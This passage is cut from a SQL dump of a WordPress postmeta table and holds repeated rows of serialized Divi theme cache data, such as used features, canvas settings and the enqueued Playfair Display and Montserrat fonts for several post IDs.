;a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32618,1401,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32619,1401,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'); INSERT INTO `wpln_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (32620,767,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32621,767,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32615,1448,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32616,1401,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32617,1401,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32612,1448,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32613,1448,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32614,1448,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32610,1063,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32611,1063,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32607,1174,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32608,1063,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32609,1063,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32603,573,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32604,1174,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32605,1174,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32606,1174,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32599,943,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32600,573,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32601,573,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32602,573,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32595,1003,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32596,943,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32597,943,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32598,943,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32587,822,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32588,822,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32589,822,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32590,822,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32591,1685,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32592,1003,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32593,1003,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32594,1003,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32584,1462,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32585,1462,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32586,1462,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32582,956,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32583,1462,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32576,1541,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32577,1541,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32578,1541,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32579,956,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32580,956,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32581,956,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32572,1256,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32573,1256,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32574,1256,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32575,1541,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32568,1657,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32569,1657,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32570,1657,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:1